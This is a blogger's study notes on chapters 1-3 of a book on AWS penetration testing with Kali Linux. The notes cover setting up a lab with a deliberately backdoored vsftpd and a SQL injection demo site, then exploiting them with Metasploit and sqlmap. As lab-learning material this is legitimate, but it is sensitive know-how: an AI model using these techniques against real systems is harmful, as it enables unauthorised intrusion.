It’s book club time again! I want to do notes to kind of keep myself accountable, but I don’t have the time to devote to doing them “right.” So they will be fast, concise, and possibly convoluted. I’m going to focus on where I ran into issues, but hopefully write them like I was trying to walk someone through it. The notes may get shorter as we go along…
Book info – Hands-On AWS Penetration Testing with Kali Linux
It’s a Packt book, which means some people will not have the best perception. I’ve found Packt is a publisher people have some strong opinions about. I’ve pulled a lot of their free offerings and picked up a cybersecurity Humble Bundle offer. My general impression is mostly good info, sometimes with less attention to detail than I would prefer. I wouldn’t discourage people from getting Packt books, and I’ve gotten a lot of value out of what I have. Just not always the best copy editing. To be fair, these tend to be highly technical books that are a bear to edit and because of the nature of technology, it’s just about impossible to get a book to press before the instructions become somewhat obsolete. So be aware that you may have to some digging to get things to work.
And that’s really why I want to do the quick notes. Because, for instance, tomcat is no longer included in the Kali packages, so you can’t apt-get it. Not a big deal, but it makes setting up tomcat a different process.
Disclaimer: Working through this book will use AWS, which costs money. Make sure you are doing things to manage your costs. If I remember, I’ll keep up with my costs to help get a general idea. But prices can change at any time, so major grain of salt.
Disclaimer #2: Jail is bad. Cybercrime is illegal. Educational purposes. IANAL. Don’t do things you shouldn’t. Etc.
Ch 1 – Setting Up a Pentesting Lab on AWS
I’ve done a bit with AWS. It’s what I used for my pentesting environment for The Hacker Playbook 3, but I’ve not used it in awhile. Setting up an account takes some time and will require a credit card. I recommend adding 2-factor authentication…but like Frank’s Red Hot, I put that stuff on everything. AWS has some free training available. I plan to do a little of it as I work through this book, but it won’t be a focus.
Setup was pretty straightforward. I generally pick a free tier and go from there. I used the free tier for my Kali box while I was doing light stuff and pushed it up to the recommended t2.medium level when I started using it. It’s a small price increase, but the time save it worth it to me.
Ubuntu EC2 Instance
As of early 2020, you could still find an Ubuntu 16.04 LTS instance to load. These should stick around a bit since they are EOL in 2024. Keep in mind the console changes frequently, so the screenshots may not match exactly. I’ve found both AWS and Azure to usually keep things similar to older versions and relatively intuitive to navigate. It can take a minute to get oriented though.
Note: I think the Kali set-up is more detailed, so if you are really new to AWS, might want to jump ahead to that section to start.
Use the defaults, pick a region (usually pick what’s closest) – you need to keep all the instances for your lab in the same region. And note the VPC and subnet so you can use those for the other instances as well. AWS will walk you through accessing the system, but the SSH setup can be a little daunting if you haven’t done much with it. I like to use Windows Subsystem for Linux (WSL) and/or Putty depending on what I’m doing. The SSH setup is easier using Linux or WSL because the key permissions are easier to adjust. If you are using WSL, make sure you copy the key file over to your WSL file structure so you can adjust the permissions. For Putty, you’ll have to make a special Putty key file. AWS has some really good documentation, and there will be walkthroughs as you are setting things up.
Connect, run your upgrades and wait for them to complete. I’ve been using the public DNS rather than IP because…well, because. I think that’s AWS suggests. For Ubuntu, you’ll be using
ubuntu as the user.
ssh -i <pem file> <user>@<Public DNS or IP> sudo apt-get update && sudo apt-get dist-upgrade
Install a backdoored version of
vsftpd and get that set up so you have a vulnerable service. Info about this version is hosted on Nik Dubois’ Github. There some good background info there too. Followed the setup as in the book with no problems. Good instance to start with because it was pretty straightforward and not much room for things to go haywire.
The Windows instance is also fairly straightforward, but (thankfully) there is no 2003 image available. Kind of super ok with that. The next “best” option is a 2008 image. I opted for the CIS Microsoft Windows Servicer 2008 R2 level 1 benchmark. There are other options – I went with CIS because I didn’t want to take the time to look into who made the other images and the cost was in-line with the other images. From a build-out perspective, it’s great knowing pre-hardened images are on there. So if you are using CIS benchmarks, you can maintain that practice moving into AWS.
Starting the instance is about the same. Be sure to verify your region, VPC, and subnet settings match. You will use your existing key-pair to set up access. Since SSH isn’t an option, you have to set up RDP (which is part of why I wanted to use at least a somewhat hardened image – because RDP and Internet exposure make me nervous). Basically, right click on the instance, pick Get Windows Password and follow the directions. Make sure you take note of the password – you’ll be up a creek without it. Then RDP in as normal using either IP or DNS (I again prefer the DNS). Install Firefox and then on to XAMPP. I installed the current version of XAMPP since I’m on a 2008 box.
Clear the hosting folder (Note – This is
C:\xampp, not that anyone would ever be in a hurry and overlook that.), drop in the sql injection demo (ShinDarth is now FrancescoBorzi – be cautious just blindly following downloads, githubs change as we learned working with Slurp in THP3, which ironically deals with AWS S3 buckets). Don’t overlook creating a database and importing the data. Then verify you have a functioning SQL Injection Demonstration Project site on your local host.
Configuring Security Groups
The default in AWS is to not allow communication between EC2 instances. Prefer this setup, but it means some work to get your lab boxes talking to each other. Basically grab the private IP of the Ubuntu instance and add an inbound rule allowing all traffic from the Ubuntu box. (The book gets confused and refers to the Kali box instead of the Ubuntu one for a big chunk of this section – it’s easy to see what is meant, but it’s an example of the editing/attention to detail thing). Then curl the webpage hosted on your Windows box to verify.
curl -vL <Private_IP_of_Windows_Instance>
If you don’t get anything, double check your AWS Security Group for the Windows box. If that’s correct, check your Windows instance for a firewall. The CIS image I used had the firewall enabled and managed via group policy. I just added rules in the Windows firewall (from Server Manager) to allow inbound traffic from the other instances. For good measure, I added outbound rules as well. Shouldn’t be necessary, but since it’s at least a somewhat hardened image, I’d rather add the rule and have it done that find out later there’s some weird thing there.
I also restricted the inbound rules for all hosts to the IPs I’ll use to connect to them. Call me paranoid, but I’d rather adjust the AWS Security Group as needed than leave RDP on a Windows 2008 R2 box exposed to the wild. Even if I don’t leave the instance running all the time.
Ch 2 – Setting Up a Kali PentestBox on the Cloud
There’s a Kali AMI (Amazon Machine Image) available. Bear in mind Kali has had some pretty big changes occur with the end of 2019 releases (2019.3 and 2019.4) and the first 2020 release. So be prepared for some mental gymnastics if you’ve used older versions of Kali much. I get a huge kick out of Kali-Undercover, but it’s taking some time to get a fresh 2020.1 install setup the way I like. (Sigh.)
Spinning up the instance is straightforward. Make sure it’s using the latest Kali build. Check the region, VPC, and subnet to make sure they match. Use the key pair previously created. And voila.
I started with a micro instance to run updates and what not. Mostly just to see what it would handle. I’ve bumped that up to the recommended t2.medium because the demands on the instance were testing my patience with the t2.micro resources.
Set up the Security Group to allow traffic to your other instances, SSH, and Guacamole. Again, call me paranoid but I restricted the source on these to where I’d be using them.
Kali gets setup for password access after you SSH using your keys. The basic account is
ec2-user and it has sudo privileges. First up change the passwords…
#Change root password sudo passwd #Change user password sudo passwd <user> sudo passwd ec2-user
Then edit the
/etc/ssh/sshd_config file to allow PasswordAuthentication and PermitRootLogin (if desired). Restart the ssh service, and done. Just CLI though, so that’s where Guacamole comes in. And this is where things got wonky.
Tomcat & Guacamole
ufw firewall was typical. More info about that is in the Ubuntu docs. Installing the prerequisites for Guacamole, remember that there aren’t
- between the
lib and whatever comes next. And exclude
tomcat8 because you can’t install it with
To install tomcat, you need to just download it. I’m in the habit of installing stuff to
/opt/ to help me keep track of the tools I use, so that’s where I’ll install. The Digital Ocean guide for 16.04 is pretty good. Except the systemd script did not work. And trying to fix it resulted in chasing a whole lot of rabbits. What is came down to is basically the way tomcat is designed apparently doesn’t work so hot with the current version of systemd. Upside, learned a lot about tomcat and how systemd functions. Downside, opened a serious can of worms. Because I’m a somewhat stubborn person, I was determined to get the systemd script working. There were issues with finding java in the script from Digital Oceans and I’m not confident in the security of what I ended up with. It works, but I would not trust it in production.
For the path of least resistance (and the one I would actually recommend), follow the symbolic link directions from kodmanyagha in this post on superuser and use
chmod +x /opt/tomcat8/bin/*.sh ln -s /opt/tomcat8/bin/startup.sh /usr/bin/tomcatstart ln -s /opt/tomcat8/bin/shutdown.sh /usr/bin/tomcatshutdown
I did a lot of digging and finally ended up using 750 for my directory permissions and 520 for the files in the tomcat directory. My start up script ended up looking like oers comment on gist.
[Unit] Description=Start Tomcat After=network.target [Service] Type=forking WorkingDirectory=/opt/tomcat8 User=tomcat Environment=JRE_HOME=/usr Environment=JAVA_HOME=/usr Environment=CATALINA_HOME=/opt/tomcat8 Environment=CATALINA_BASE=/opt/tomcat8 ExecStart=/opt/tomcat8/bin/startup.sh ExecStop=/opt/tomcat8/bin/shutdown.sh SyslogIdentifier=tomcat-%i [Install] WantedBY=multi.user
server.xml file was in
./tomcat8/conf not just
Once I dealt with the tomcat issue, the rest was fairly straightforward. Download the guacamole files, extract, move to the guacamole-server directory, install. Configure for SSH and RDP. The
/etc/guacamole directory and files are not automatically created, so you have to do those manually. I did a lot of the troubleshooting for this by setting up a Kali VM. A couple odd things I noticed on that were having to enable the ssh service (makes sense because I suspect the AMI kind of has to have that enabled but wouldn’t be by default) and you can’t RDP into a box using Guacamole when you are logged on locally. I’m also not sure what changed, but I also had to set up my network adapters to both come on – something I’ve never had to do with a Kali VM in the past. If you run into this issue, this walkthrough should get you up and running. Basically just edit the
/etc/network/interfaces to include the adapters and set them to auto.
Guacamole is running over HTTP, so you really need to be cautious about how you leave this box exposed. I choose to set up a tunnel (covered in the next section).
Ch 3 – Exploitation on the Cloud Using Kali Linux
This chapter is a great intro to exploitation, and it’s something most people should be able to handle without much frustration.
Configuring and Running Nessus
This part was straightforward. Download Nessus, transfer to Kali. I just used WSL. The book covers using WinSCP, which looks interesting. But not a rabbit I want to chase at the moment. It looks fairly easy to use, so I may set it up if I need to transfer more files in the future. Once the file is there,
dpkg it and start the service. I put mine in
/opt/nessus by moving the file and running
dpkg from the folder.
Setting up the tunnel was straightforward. I decided to set it up in Putty so I could easily put in tunnels for Nessus and Guacamole – Putty > Connection > SSH > Tunnels. Then add 8834 and 55555. You should be able to do the same with ssh.
ssh -L 8834:127.0.0.1:8834 -L 55555:127.0.0.1:55555 ec2-user@<instanceIPorDNS>
Setting up Nessus, runs, well, like setting up Nessus. Access the webpage, request code, get code from email, enter code, create account, wait and wait and wait while it compiles the plugins.
Then run the scan. The scan done for the book is a complex one, so expect to wait for 20 minutes or so.
Exploiting a Vulnerable Linux VM
Review the results, notice it’s all at the information level. The vsftp server has a backdoor, but apparently that doesn’t qualify as critical (insert sarcasm as needed). Read over the rest of the info – the more you look at information like this, the easier it is to spot potential vulnerabilities.
For this one, it’s a Metasploit module, and it runs completely as expected.
Exploiting a Vulnerable Windows VM
These results are going to be different than the book since I’m running a 2008 instance instead of 2003. For this, it doesn’t matter since the website is the target for this exercise. It’s easy to go through the commands using
sqlmap, but if you aren’t familiar with the tool do some background reading. I’ve used it a little, but I’ve only scratched the surface of what it can do.
That wraps section 1. Other than fighting with tomcat and adjusting the Windows firewall, it was pretty smooth. My lab costs were less than $2.00 (US) after finishing this section. The next section goes more in-depth with EC2 instances, so I’m looking forward to learning more about the AWS environment.